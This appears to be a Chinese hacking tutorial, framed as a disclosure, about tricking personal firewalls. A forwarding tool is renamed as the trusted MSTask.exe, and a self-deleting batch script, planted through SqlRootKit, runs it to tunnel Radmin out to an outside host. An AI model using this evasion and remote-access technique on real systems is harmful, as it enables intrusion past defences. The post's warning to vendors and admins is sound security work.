一直以來(lái)都有一個(gè)夢(mèng)想：偶要是能發(fā)現(xiàn)些漏洞或BUG什么的該多好啊！于是整天對(duì)著電腦瞎弄瞎研究，研究什么呢？研究如何突破防火墻（偶這里指的防火墻是軟體型的個(gè)人防火墻，硬件的偶也沒(méi)條件。）嘿嘿，你還別說(shuō)，還真沒(méi)白研究，還真給偶發(fā)現(xiàn)了大多數(shù)防火墻的通病。這個(gè)BUG能讓我們欺騙防火墻來(lái)達(dá)到訪外的目的，具體情況是怎么樣的呢？請(qǐng)看下面的解說(shuō)！ 
首先，我要介紹一下Windows系統(tǒng)特性，當(dāng)一個(gè)程序運(yùn)行時(shí)，它不能刪除，但卻能夠改名！而當(dāng)系統(tǒng)里的被保護(hù)程序遭到刪除或損壞或改名時(shí)系統(tǒng)就會(huì)及時(shí)調(diào)用備份文件給予還原！我再講講防火墻，大家都知道許多防火墻的“應(yīng)用程序規(guī)則”里一般默認(rèn)就會(huì)讓IE瀏覽器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通過(guò)，而大多的防火墻認(rèn)為只要是與規(guī)則里的路徑及文件名相同就Pass！以這樣的檢測(cè)方法來(lái)決定是否放行，但它卻完全沒(méi)考慮到如果是別的文件替換的呢？——就相當(dāng)于古裝片里的易容術(shù)，易容后就認(rèn)不得了！這就給了我們機(jī)會(huì)，我們可以利用這個(gè)BUG來(lái)欺騙防火墻來(lái)達(dá)到訪外的目的！ 
小知識(shí)：其實(shí)現(xiàn)在大多木馬采用的DLL插線程技術(shù)也就是利用了這個(gè)原理，它們首先隱蔽的開(kāi)啟一個(gè)認(rèn)證放行的程序進(jìn)程（如Iexplore.exe進(jìn)程），接著把DLL型木馬插入這個(gè)線程內(nèi)，然后訪外時(shí)就可輕松突破防火墻的限制了——因?yàn)榉阑饓κ遣粫?huì)攔截已認(rèn)證放行的程序的。 
原理講完了，我們現(xiàn)在講講該如何利用這個(gè)BUG了！這里我用虛擬機(jī)做實(shí)驗(yàn)，制造如下條件： 
為了更符合現(xiàn)實(shí)，我給服務(wù)器安裝了“天網(wǎng)防火墻”、Radmin（但由于防火墻指定了訪問(wèn)IP地址，所以沒(méi)辦法正常連接?。?，MSSQL SERVER、Serv-u。首先我們用常用的方法進(jìn)行端口轉(zhuǎn)發(fā)，看看防火墻有什么反應(yīng)！ 
第一步，啟用AngelShell Ver 1.0里的Fport（用來(lái)進(jìn)行端口轉(zhuǎn)發(fā)的服務(wù)端，幾乎可以轉(zhuǎn)發(fā)任何端口），然后在本地用FportClient（用來(lái)進(jìn)行端口轉(zhuǎn)發(fā)的客戶端）監(jiān)聽(tīng)好！ 
第二步，直接在CMDSHELL里運(yùn)行“e:\www\fport.exe 4899 192.168.1.1 7788”，這時(shí)我們看到虛擬機(jī)里的“天網(wǎng)”對(duì)Fport馬上進(jìn)行了攔截。  

看到了吧！由于Fport并不是認(rèn)證放行的，防火墻馬上就進(jìn)行了攔截！OK，現(xiàn)在我們實(shí)行欺騙計(jì)劃，看偶如何突破防火墻的！還是執(zhí)行第一步，然后新建一個(gè)批處理，內(nèi)容如下： 
ren MSTask.exe MSTask1.exe 
ren fport.exe MSTask.exe 
MSTask.exe 4899 192.168.1.1 7788 
Del %0 
命名為go.bat，接著用SqlRootKit把“Fport.exe”和go.bat 一起copy到目標(biāo)機(jī)子的c:\winnt\system32\（也就是MSTask所在的目錄）在SqlRootKit里執(zhí)行g(shù)o.bat（注意如果要改MSTask.exe的名的話就需要有管理員權(quán)限）。 
當(dāng)FportClient出現(xiàn)“已經(jīng)接受到遠(yuǎn)程計(jì)算機(jī)的連接！”時(shí)，用Radmin客戶端連接本機(jī)的4899端口。 

我們已經(jīng)成功突破限制（由于防火墻沒(méi)有限制本地連接4899端口，我們用Fport轉(zhuǎn)發(fā)了它的端口，登錄時(shí)等于本地連接，因此我們能夠成功連接），這樣一來(lái)，我們本不能逃過(guò)防火墻的Fport便變成了一個(gè)有“插線程”技術(shù)的端口轉(zhuǎn)發(fā)工具了！ 
據(jù)我實(shí)驗(yàn)，國(guó)內(nèi)的防火墻幾乎無(wú)一例外的“擁有”這個(gè)BUG！雖然這個(gè)BUG不會(huì)帶來(lái)什么大的危害，但總是給入侵者多了一個(gè)黑我們的機(jī)會(huì)！ 
WTF老大說(shuō)獨(dú)樂(lè)樂(lè)不如眾樂(lè)樂(lè)，所以我還是公布出來(lái)了，一是可以讓我們國(guó)內(nèi)的防火墻有所改進(jìn)，二是給網(wǎng)管們提個(gè)醒！由于小弟技術(shù)有限，難免會(huì)出現(xiàn)錯(cuò)誤，歡迎各位指正批評(píng)。 

N/P （NetPatch） 

最新評(píng)論